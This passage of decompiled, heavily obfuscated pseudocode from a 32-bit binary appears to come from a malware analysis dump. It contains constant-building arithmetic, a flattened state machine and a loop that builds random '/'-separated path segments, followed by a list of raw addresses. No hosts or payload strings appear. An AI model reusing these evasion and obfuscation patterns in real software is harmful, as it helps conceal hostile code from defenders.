				 *(_t1012 + 0x38) = 0x7f7f;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) + 0xffffaeb4;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) + 0xffff06c6;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) << 0xf;
				 *(_t1012 + 0x38) =  *(_t1012 + 0x38) ^ 0x9a7cd3e3;
				 *(_t1012 + 0xa8) = 0xf2f;
				_t887 = 0x4b;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa8) * 0x34;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) * 0x15;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) ^ 0x0040dcde;
				 *(_t1012 + 0x9c) = 0x259b;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) / _t887;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) | 0xb0025bdd;
				 *(_t1012 + 0x9c) =  *(_t1012 + 0x9c) ^ 0xb0023f27;
				 *(_t1012 + 0x5c) = 0xf72d;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0xb64c;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0xffff542c;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) >> 3;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) ^ 0x00003f89;
				 *(_t1012 + 0x54) = 0xcb46;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0x17d5c45e;
				_t888 = 0xf;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x54) * 0x28;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) * 0x7b;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) ^ 0x06ba3f8c;
				 *(_t1012 + 0x130) = 0x1c0d;
				 *(_t1012 + 0x130) =  *(_t1012 + 0x130) << 3;
				 *(_t1012 + 0x130) =  *(_t1012 + 0x130) ^ 0x0000c19e;
				 *(_t1012 + 0x50) = 0x99a2;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) * 0x3c;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) << 2;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) ^ 0x0b9e099b;
				 *(_t1012 + 0x50) =  *(_t1012 + 0x50) ^ 0x0b0e3d8f;
				 *(_t1012 + 0xdc) = 0xc4f9;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) / _t888;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) ^ 0x00001e9f;
				 *(_t1012 + 0x134) = 0xe9a6;
				_t889 = 0x25;
				 *(_t1012 + 0x134) =  *(_t1012 + 0x134) * 0x38;
				 *(_t1012 + 0x134) =  *(_t1012 + 0x134) ^ 0x00330038;
				 *(_t1012 + 0x104) = 0xfa06;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) + 0xffff4131;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) ^ 0x00007322;
				 *(_t1012 + 0xa4) = 0x3711;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) >> 6;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) + 0x3b98;
				 *(_t1012 + 0xa4) =  *(_t1012 + 0xa4) ^ 0x00002f0a;
				 *(_t1012 + 0x24) = 0xdc2f;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0xf29ba80e;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) / _t889;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) + 0x267d;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0x068eac78;
				 *(_t1012 + 0x54) = 0xb4c2;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) >> 4;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0x633a81e3;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0xd55c9070;
				 *(_t1012 + 0x54) =  *(_t1012 + 0x54) ^ 0xb6663903;
				 *(_t1012 + 0xc0) = 0x8be9;
				_t890 = 0x3b;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xc0) / _t890;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xbc) + 0xffff9a8b;
				 *(_t1012 + 0xbc) =  *(_t1012 + 0xbc) ^ 0xffffa766;
				 *(_t1012 + 0x78) = 0x5bde;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) * 0x59;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) << 0xd;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) >> 9;
				 *(_t1012 + 0x78) =  *(_t1012 + 0x78) ^ 0x007f2aa6;
				 *(_t1012 + 0x90) = 0x411a;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0xcf7ab9d1;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) >> 7;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x019eb365;
				 *(_t1012 + 0xe0) = 0x6764;
				 *(_t1012 + 0xe0) =  *(_t1012 + 0xe0) ^ 0xbe6d5056;
				 *(_t1012 + 0xe0) =  *(_t1012 + 0xe0) ^ 0xbe6d5d89;
				 *(_t1012 + 0x108) = 0x76f2;
				 *(_t1012 + 0x108) =  *(_t1012 + 0x108) ^ 0xb105586c;
				 *(_t1012 + 0x108) =  *(_t1012 + 0x108) ^ 0xb10528cb;
				 *(_t1012 + 0xe8) = 0x1628;
				 *(_t1012 + 0xe8) =  *(_t1012 + 0xe8) << 0xf;
				 *(_t1012 + 0xe8) =  *(_t1012 + 0xe8) ^ 0x0b146bd8;
				 *(_t1012 + 0x13c) = 0x8150;
				 *(_t1012 + 0x13c) =  *(_t1012 + 0x13c) ^ 0x01db2c46;
				 *(_t1012 + 0x13c) =  *(_t1012 + 0x13c) ^ 0x01dbc499;
				 *(_t1012 + 0x28) = 0xe57d;
				 *(_t1012 + 0x28) =  *(_t1012 + 0x28) + 0xffff940d;
				_t891 = 0x52;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x28) * 0xa;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) / _t891;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0x00002d62;
				 *(_t1012 + 0xd4) = 0xda51;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) << 8;
				_t892 = 0x2f;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) / _t892;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) ^ 0x0004b460;
				 *(_t1012 + 0x144) = 0xc4bd;
				 *(_t1012 + 0x144) =  *(_t1012 + 0x144) | 0x99168015;
				 *(_t1012 + 0x144) =  *(_t1012 + 0x144) ^ 0x991680ca;
				 *(_t1012 + 0x4c) = 0xf40b;
				_t893 = 0xf;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x4c) * 0x64;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) >> 0x10;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) + 0x4d44;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) ^ 0x00003d1f;
				 *(_t1012 + 0x80) = 0xe0fb;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x7a83a018;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x3dd3f5db;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x2cc23c84;
				 *(_t1012 + 0x80) =  *(_t1012 + 0x80) ^ 0x6b92f75e;
				 *(_t1012 + 0x40) = 0x3ba;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0xe0c2;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) * 0x6e;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0x8785;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) ^ 0x00629da9;
				 *(_t1012 + 0x110) = 0xc1c4;
				 *(_t1012 + 0x110) =  *(_t1012 + 0x110) ^ 0xb305b232;
				 *(_t1012 + 0x110) =  *(_t1012 + 0x110) ^ 0xb3050daf;
				 *(_t1012 + 0x138) = 0x83df;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x6f2297cb;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x6f221ab4;
				 *(_t1012 + 0xec) = 0xe7e3;
				 *(_t1012 + 0xec) =  *(_t1012 + 0xec) >> 0xe;
				 *(_t1012 + 0xec) =  *(_t1012 + 0xec) ^ 0x00003f29;
				 *(_t1012 + 0x6c) = 0x9be6;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) | 0xdb39baf6;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) * 0xe;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 4;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) ^ 0xd2843690;
				 *(_t1012 + 0x98) = 0x25e5;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) * 0x5f;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) + 0xf2a9;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x000f50c4;
				 *(_t1012 + 0xf0) = 0x6aad;
				 *(_t1012 + 0xf0) =  *(_t1012 + 0xf0) >> 0xb;
				 *(_t1012 + 0xf0) =  *(_t1012 + 0xf0) ^ 0x00000b06;
				 *(_t1012 + 0x11c) = 0xe6d7;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) * 0x44;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) ^ 0x003d0209;
				 *(_t1012 + 0x58) = 0xa945;
				 *(_t1012 + 0x58) =  *(_t1012 + 0x58) / _t893;
				_t894 = 0x22;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x58) / _t894;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) + 0x1aba;
				 *(_t1012 + 0x5c) =  *(_t1012 + 0x5c) ^ 0x00003b06;
				 *(_t1012 + 0x64) = 0x44c5;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) + 0x4f06;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) << 0xe;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) >> 0xb;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0x0004ce26;
				 *(_t1012 + 0x3c) = 0xcc93;
				_t895 = 0x1a;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t895;
				_t896 = 0x29;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t896;
				_t897 = 0x77;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) / _t897;
				 *(_t1012 + 0x3c) =  *(_t1012 + 0x3c) ^ 0x000043f4;
				 *(_t1012 + 0x12c) = 0xa0a2;
				 *(_t1012 + 0x12c) =  *(_t1012 + 0x12c) ^ 0x7e84551b;
				 *(_t1012 + 0x12c) =  *(_t1012 + 0x12c) ^ 0x7e84971f;
				 *(_t1012 + 0x74) = 0xdad7;
				_t898 = 0x26;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) / _t898;
				_t899 = 0x42;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) * 0x48;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) + 0xffff34f2;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) ^ 0x0000936e;
				 *(_t1012 + 0x34) = 0x892d;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) >> 6;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) ^ 0xe5fcb6e4;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) << 4;
				 *(_t1012 + 0x34) =  *(_t1012 + 0x34) ^ 0x5fcb3f6d;
				 *(_t1012 + 0xfc) = 0x9a3e;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) / _t899;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) ^ 0x00006544;
				 *(_t1012 + 0x124) = 0x2293;
				 *(_t1012 + 0x124) =  *(_t1012 + 0x124) + 0x79b;
				 *(_t1012 + 0x124) =  *(_t1012 + 0x124) ^ 0x00006b1d;
				 *(_t1012 + 0xbc) = 0x3e81;
				_t900 = 7;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xbc) * 0x31;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) + 0xb35c;
				 *(_t1012 + 0xb8) =  *(_t1012 + 0xb8) ^ 0x000cf45c;
				 *(_t1012 + 0x64) = 0x7cb6;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0x88e3463d;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) * 0x56;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) << 0xf;
				 *(_t1012 + 0x64) =  *(_t1012 + 0x64) ^ 0xd559658e;
				 *(_t1012 + 0xac) = 0xf45a;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) / _t900;
				_t901 = 0x60;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) * 0x3e;
				 *(_t1012 + 0xac) =  *(_t1012 + 0xac) ^ 0x000800e5;
				 *(_t1012 + 0xe4) = 0xf8f;
				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) >> 4;
				 *(_t1012 + 0xe4) =  *(_t1012 + 0xe4) ^ 0x0000477d;
				 *(_t1012 + 0xdc) = 0xf07b;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) >> 0xb;
				 *(_t1012 + 0xdc) =  *(_t1012 + 0xdc) ^ 0x00007281;
				 *(_t1012 + 0xd4) = 0xb5b1;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) << 0xd;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) + 0xffff2f0a;
				 *(_t1012 + 0xd4) =  *(_t1012 + 0xd4) ^ 0x16b57b93;
				 *(_t1012 + 0x10c) = 0xd67e;
				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b92c7;
				 *(_t1012 + 0x10c) =  *(_t1012 + 0x10c) ^ 0x498b23c9;
				 *(_t1012 + 0xcc) = 0x2221;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) << 2;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) >> 6;
				 *(_t1012 + 0xcc) =  *(_t1012 + 0xcc) ^ 0x0000659f;
				 *(_t1012 + 0x104) = 0x2a0b;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) >> 4;
				 *(_t1012 + 0x104) =  *(_t1012 + 0x104) ^ 0x000066a5;
				 *(_t1012 + 0xc8) = 0x810d;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) / _t901;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) << 0x10;
				 *(_t1012 + 0xc8) =  *(_t1012 + 0xc8) ^ 0x01580000;
				_t902 =  *((intOrPtr*)(_t1012 + 0x158));
				 *((intOrPtr*)(_t1012 + 0x14)) =  *((intOrPtr*)(_t1012 + 0x15c));
				 *((intOrPtr*)(_t1012 + 0x154)) = _t902;
				while(1) {
					_t1015 = _t906 - 0x1e362325;
					if(_t1015 > 0) {
						goto L30;
					}
					L2:
					if(_t1015 == 0) {
						_push(_t906);
						_t1001 = E1000ADBD( *((intOrPtr*)(_t997 + 4)));
						_t902 = E100157E8(_t838);
						 *((intOrPtr*)(_t1012 + 0x158)) = _t902;
						__eflags = _t902;
						if(__eflags != 0) {
							_t823 = E1001BD4A( *(_t1012 + 0xc0),  *(_t1012 + 0x3c), __eflags, _t902,  *(_t1012 + 0xcc), _t1001,  *_t997,  *((intOrPtr*)(_t997 + 4)));
							_t1012 = _t1012 + 0x14;
							 *((intOrPtr*)(_t1012 + 0x14)) = _t823;
							__eflags = _t823;
							if(__eflags == 0) {
								E100091CD( *(_t1012 + 0x90),  *((intOrPtr*)(_t1012 + 0x120)),  *(_t1012 + 0x84), _t902,  *(_t1012 + 0x74));
							} else {
								_t906 = 0x30070f42;
								goto L13;
							}
						}
					} else {
						_t1016 = _t906 - 0x12f44b45;
						if(_t1016 > 0) {
							__eflags = _t906 - 0x1993ee00;
							if(_t906 == 0x1993ee00) {
								_t926 = _t1012 + 0x17c;
								E100106C2(_t926,  *(_t1012 + 0xb4),  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0x11c), _t1012 + 0x158);
								_t1012 = _t1012 + 0xc;
								asm("sbb ecx, ecx");
								_t906 = (_t926 & 0x08d2d6d7) + 0x3077984c;
								goto L10;
							} else {
								__eflags = _t906 - 0x1bb47d9a;
								if(_t906 == 0x1bb47d9a) {
									 *(_t1012 + 0x164) =  *(_t1012 + 0xc8);
									 *(_t1012 + 0x168) =  *(_t1012 + 0x168) & 0x00000000;
									_t928 =  *(_t1012 + 0x168);
									E1000ADCE(_t928,  *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xa4), _t1012 + 0x1a4,  *(_t1012 + 0x5c),  *(_t1012 + 0x128), _t1012 + 0x29c, _t1012 + 0x17c, _t1012 + 0x168,  *((intOrPtr*)(_t1012 + 0x140)),  *((intOrPtr*)(_t1012 + 0x16c)), _t1012 + 0x488);
									_t1012 = _t1012 + 0x28;
									asm("sbb ecx, ecx");
									_t906 = (_t928 & 0x1b5b9d4f) + 0x12f44b45;
									goto L10;
								} else {
									__eflags = _t906 - 0x1bef9ca6;
									if(_t906 != 0x1bef9ca6) {
										goto L44;
									} else {
										_t998 = _t1012 + 0x288;
										_t930 = 6;
										_t1010 =  *(_t1012 + 0x14c) % _t930 + 1;
										__eflags = _t1010;
										if(__eflags != 0) {
											__eflags = 1;
											do {
												_t881 = 0xf;
												_t1006 = ( *(_t1012 + 0x14c) & _t881) + 4;
												E100060DA(_t1012 + 0x14c,  *(_t1012 + 0xe8), 1, _t1006,  *(_t1012 + 0x13c),  *(_t1012 + 0x108),  *(_t1012 + 0xa4), _t998);
												_t1012 = _t1012 + 0x18;
												_t999 = _t998 + _t1006 * 2;
												_t883 = 0x2f;
												 *_t999 = _t883;
												_t998 = _t999 + 2;
												_t1010 = _t1010 - 1;
												__eflags = _t1010;
											} while (__eflags != 0);
											_t902 =  *((intOrPtr*)(_t1012 + 0x154));
											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
										}
										_t1008 =  *((intOrPtr*)(_t1012 + 0x150));
										 *_t998 = 0;
										_t906 = 0x93c2f64;
										_t823 =  *((intOrPtr*)(_t1012 + 0x14));
										_t997 =  *((intOrPtr*)(_t1012 + 0xc90));
										continue;
									}
								}
							}
						} else {
							if(_t1016 == 0) {
								E100091CD( *(_t1012 + 0x6c),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0x130),  *((intOrPtr*)(_t1012 + 0x170)),  *((intOrPtr*)(_t1012 + 0x70)));
								_t1012 = _t1012 + 0xc;
								_t906 = 0x1ac68c4;
								goto L10;
							} else {
								if(_t906 == 0x1ac68c4) {
									E100091CD( *(_t1012 + 0x3c),  *(_t1012 + 0x104),  *(_t1012 + 0x128),  *((intOrPtr*)(_t1012 + 0x15c)),  *(_t1012 + 0xb8));
									_t1012 = _t1012 + 0xc;
									_t906 = 0x3077984c;
									goto L10;
								} else {
									if(_t906 == 0x4136454) {
										E100091CD( *(_t1012 + 0xa4),  *(_t1012 + 0xfc),  *(_t1012 + 0x124),  *(_t1012 + 0x164),  *(_t1012 + 0x58));
										_t1012 = _t1012 + 0xc;
										_t906 = 0x12f44b45;
										goto L10;
									} else {
										if(_t906 == 0x599ba18) {
											_push(0x100014d4);
											_push( *(_t1012 + 0xc0));
											E100164EC(_t1012 + 0x214, __eflags, E1001BF25( *(_t1012 + 0x28),  *(_t1012 + 0x58), __eflags),  *(_t1012 + 0x98), 0x400, _t1012 + 0x2a0, _t1012 + 0x198,  *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0xec),  *(_t1012 + 0x110));
											E1001C5F7( *(_t1012 + 0x11c),  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x58),  *(_t1012 + 0xfc), _t861);
											_t1012 = _t1012 + 0x34;
											_t906 = 0x2dee6d8e;
											L12:
											_t823 =  *((intOrPtr*)(_t1012 + 0x14));
											L13:
											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
											continue;
										} else {
											_t1020 = _t906 - 0x93c2f64;
											if(_t906 != 0x93c2f64) {
												L44:
												__eflags = _t906 - 0x12d8e207;
												if(__eflags != 0) {
													continue;
													do {
														while(1) {
															_t1015 = _t906 - 0x1e362325;
															if(_t1015 > 0) {
																goto L30;
															}
															goto L2;
														}
														goto L30;
													} while (__eflags != 0);
													goto L45;
												} else {
													L45:
												}
											} else {
												E10005856(_t1012 + 0x208, _t997, _t1020);
												_t906 = 0x599ba18;
												L10:
												_t823 =  *((intOrPtr*)(_t1012 + 0x14));
												while(1) {
													_t1015 = _t906 - 0x1e362325;
													if(_t1015 > 0) {
														goto L30;
													}
													goto L2;
												}
											}
										}
									}
								}
							}
						}
					}
					L47:
					return _t1008;
					L30:
					__eflags = _t906 - 0x22fa333e;
					if(_t906 == 0x22fa333e) {
						E100091CD( *(_t1012 + 0xe0),  *((intOrPtr*)(_t1012 + 0x118)),  *(_t1012 + 0xd4), _t902,  *(_t1012 + 0x104));
						_t823 =  *((intOrPtr*)(_t1012 + 0x20));
						_t1012 = _t1012 + 0xc;
						_t906 = 0x12d8e207;
						goto L44;
					} else {
						__eflags = _t906 - 0x2a5de1a5;
						if(_t906 == 0x2a5de1a5) {
							 *(_t1012 + 0x14c) = E10017B6B();
							_t906 = 0x1e362325;
							goto L10;
						} else {
							__eflags = _t906 - 0x2dee6d8e;
							if(_t906 == 0x2dee6d8e) {
								E10011259(_t1012 + 0x15c, _t1012 + 0x20c, _t1012 + 0x16c);
								_pop(_t909);
								asm("sbb ecx, ecx");
								_t906 = (_t909 & 0x1a0814d6) + 0x1ac68c4;
								goto L10;
							} else {
								__eflags = _t906 - 0x2e4fe894;
								if(_t906 == 0x2e4fe894) {
									__eflags = E1000C07D( *((intOrPtr*)(_t1012 + 0xc98)), _t1012 + 0x164,  *(_t1012 + 0xf0),  *(_t1012 + 0x6c));
									_t906 = 0x4136454;
									_t831 = 1;
									_t1008 =  !=  ? _t831 : _t1008;
									 *((intOrPtr*)(_t1012 + 0x150)) = _t1008;
									goto L10;
								} else {
									__eflags = _t906 - 0x30070f42;
									if(_t906 == 0x30070f42) {
										 *((intOrPtr*)(_t1012 + 0x188)) = _t823;
										_t914 = _t1012 + 0x178;
										 *((intOrPtr*)(_t1012 + 0x180)) = _t1002;
										 *((intOrPtr*)(_t1012 + 0x18c)) = _t902;
										E1000A83A(_t914,  *((intOrPtr*)(_t1012 + 0xd0)),  *(_t1012 + 0x90), _t1012 + 0x180,  *(_t1012 + 0xb4));
										_t1012 = _t1012 + 0xc;
										asm("sbb ecx, ecx");
										_t906 = (_t914 & 0xf699bac2) + 0x22fa333e;
										goto L10;
									} else {
										__eflags = _t906 - 0x3077984c;
										if(_t906 == 0x3077984c) {
											E100091CD( *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xb8),  *(_t1012 + 0xec),  *(_t1012 + 0x178),  *(_t1012 + 0xdc));
											_t1012 = _t1012 + 0xc;
											_t906 = 0x22fa333e;
											goto L10;
										} else {
											__eflags = _t906 - 0x394a6f23;
											if(__eflags != 0) {
												goto L44;
											} else {
												_push(0x100014a4);
												_push( *(_t1012 + 0x90));
												E10003482( *(_t1012 + 0x6c), __eflags, ( *( *0x100221c0 + 0x18))[3] & 0x000000ff, _t1012 + 0x1b4,  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x14c),  *( *( *0x100221c0 + 0x18)) & 0x000000ff, ( *( *0x100221c0 + 0x18))[2] & 0x000000ff, 0x40, ( *( *0x100221c0 + 0x18))[1] & 0x000000ff, E1001BF25( *(_t1012 + 0x13c),  *(_t1012 + 0x9c), __eflags),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0xb0),  *(_t1012 + 0xa4));
												E1001C5F7( *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0x98),  *((intOrPtr*)(_t1012 + 0x16c)),  *(_t1012 + 0x88), _t867);
												_t1012 = _t1012 + 0x44;
												_t906 = 0x1bef9ca6;
												 *(_t1012 + 0x168) = ( *( *0x100221c0 + 0x18))[4] & 0x0000ffff;
												goto L12;
											}
										}
									}
								}
							}
						}
					}
					goto L47;
				}
			}

0x10019dd1
0x10019dd8
0x10019ddf
0x10019de0
0x10019de7
0x10019de8
0x10019de9
0x10019dea
0x10019def
0x10019dfa
0x10019e04
0x10019e07
0x10019e0e
0x10019e13
0x10019e1a
0x10019e25
0x10019e30
0x10019e3b
0x10019e46
0x10019e4e
0x10019e53
0x10019e5b
0x10019e63
0x10019e6b
0x10019e73
0x10019e78
0x10019e80
0x10019e88
0x10019e90
0x10019e9b
0x10019ea6
0x10019eb1
0x10019ebe
0x10019ec2
0x10019eca
0x10019ed2
0x10019eda
0x10019ee5
0x10019ef0
0x10019ef7
0x10019f02
0x10019f0a
0x10019f12
0x10019f1a
0x10019f22
0x10019f2a
0x10019f35
0x10019f48
0x10019f4f
0x10019f5a
0x10019f6d
0x10019f74
0x10019f7f
0x10019f87
0x10019f92
0x10019f9d
0x10019fa4
0x10019faf
0x10019fb7
0x10019fbc
0x10019fc4
0x10019fcc
0x10019fd4
0x10019fdc
0x10019fe1
0x10019fe9
0x10019ff1
0x10019ff9
0x1001a004
0x1001a017
0x1001a01e
0x1001a029
0x1001a036
0x1001a041
0x1001a049
0x1001a054
0x1001a05f
0x1001a067
0x1001a06f
0x1001a07a
0x1001a085
0x1001a090
0x1001a098
0x1001a0a3
0x1001a0b1
0x1001a0b6
0x1001a0bc
0x1001a0c1
0x1001a0c6
0x1001a0ce
0x1001a0d9
0x1001a0e4
0x1001a0ef
0x1001a0fa
0x1001a105
0x1001a110
0x1001a11b
0x1001a126
0x1001a131
0x1001a13c
0x1001a147
0x1001a152
0x1001a15d
0x1001a168
0x1001a174
0x1001a179
0x1001a17f
0x1001a18c
0x1001a18f
0x1001a193
0x1001a19b
0x1001a1a3
0x1001a1a8
0x1001a1ad
0x1001a1b5
0x1001a1bd
0x1001a1d3
0x1001a1da
0x1001a1e5
0x1001a1f0
0x1001a1f8
0x1001a203
0x1001a20b
0x1001a213
0x1001a21b
0x1001a220
0x1001a228
0x1001a23b
0x1001a23c
0x1001a24b
0x1001a252
0x1001a25d
0x1001a271
0x1001a278
0x1001a285
0x1001a290
0x1001a298
0x1001a2a0
0x1001a2a8
0x1001a2ad
0x1001a2b5
0x1001a2bd
0x1001a2cc
0x1001a2cf
0x1001a2d8
0x1001a2dc
0x1001a2e4
0x1001a2ef
0x1001a2f7
0x1001a302
0x1001a30f
0x1001a313
0x1001a318
0x1001a320
0x1001a328
0x1001a33e
0x1001a345
0x1001a350
0x1001a363
0x1001a366
0x1001a36d
0x1001a378
0x1001a383
0x1001a38e
0x1001a399
0x1001a3a4
0x1001a3ac
0x1001a3b7
0x1001a3c2
0x1001a3ca
0x1001a3da
0x1001a3de
0x1001a3e6
0x1001a3ee
0x1001a3f6
0x1001a3fb
0x1001a403
0x1001a40b
0x1001a413
0x1001a425
0x1001a428
0x1001a42f
0x1001a43a
0x1001a445
0x1001a452
0x1001a456
0x1001a45b
0x1001a460
0x1001a468
0x1001a473
0x1001a47e
0x1001a486
0x1001a491
0x1001a49c
0x1001a4a7
0x1001a4b2
0x1001a4bd
0x1001a4c8
0x1001a4d5
0x1001a4e0
0x1001a4e8
0x1001a4f3
0x1001a4fe
0x1001a509
0x1001a514
0x1001a51c
0x1001a52b
0x1001a52e
0x1001a53a
0x1001a53e
0x1001a546
0x1001a551
0x1001a560
0x1001a565
0x1001a56e
0x1001a579
0x1001a584
0x1001a58f
0x1001a59a
0x1001a5a7
0x1001a5a8
0x1001a5ac
0x1001a5b1
0x1001a5b9
0x1001a5c1
0x1001a5cc
0x1001a5d7
0x1001a5e2
0x1001a5ed
0x1001a5f8
0x1001a600
0x1001a60d
0x1001a611
0x1001a619
0x1001a621
0x1001a62c
0x1001a637
0x1001a642
0x1001a64d
0x1001a658
0x1001a663
0x1001a66e
0x1001a676
0x1001a681
0x1001a689
0x1001a696
0x1001a69a
0x1001a69f
0x1001a6a7
0x1001a6ba
0x1001a6c1
0x1001a6cc
0x1001a6d7
0x1001a6e2
0x1001a6ea
0x1001a6f5
0x1001a708
0x1001a70f
0x1001a71a
0x1001a728
0x1001a734
0x1001a739
0x1001a73f
0x1001a747
0x1001a74f
0x1001a757
0x1001a75f
0x1001a764
0x1001a769
0x1001a771
0x1001a77d
0x1001a782
0x1001a78c
0x1001a791
0x1001a79b
0x1001a7a0
0x1001a7a6
0x1001a7ae
0x1001a7b9
0x1001a7c4
0x1001a7cf
0x1001a7db
0x1001a7e0
0x1001a7eb
0x1001a7ee
0x1001a7f2
0x1001a7fa
0x1001a802
0x1001a80a
0x1001a80f
0x1001a817
0x1001a81c
0x1001a824
0x1001a83a
0x1001a841
0x1001a84c
0x1001a857
0x1001a862
0x1001a86d
0x1001a880
0x1001a881
0x1001a888
0x1001a893
0x1001a89e
0x1001a8a6
0x1001a8b3
0x1001a8b7
0x1001a8bc
0x1001a8c4
0x1001a8d8
0x1001a8eb
0x1001a8ec
0x1001a8f3
0x1001a8fe
0x1001a909
0x1001a911
0x1001a91c
0x1001a927
0x1001a92f
0x1001a93a
0x1001a945
0x1001a94d
0x1001a958
0x1001a963
0x1001a96e
0x1001a979
0x1001a984
0x1001a98f
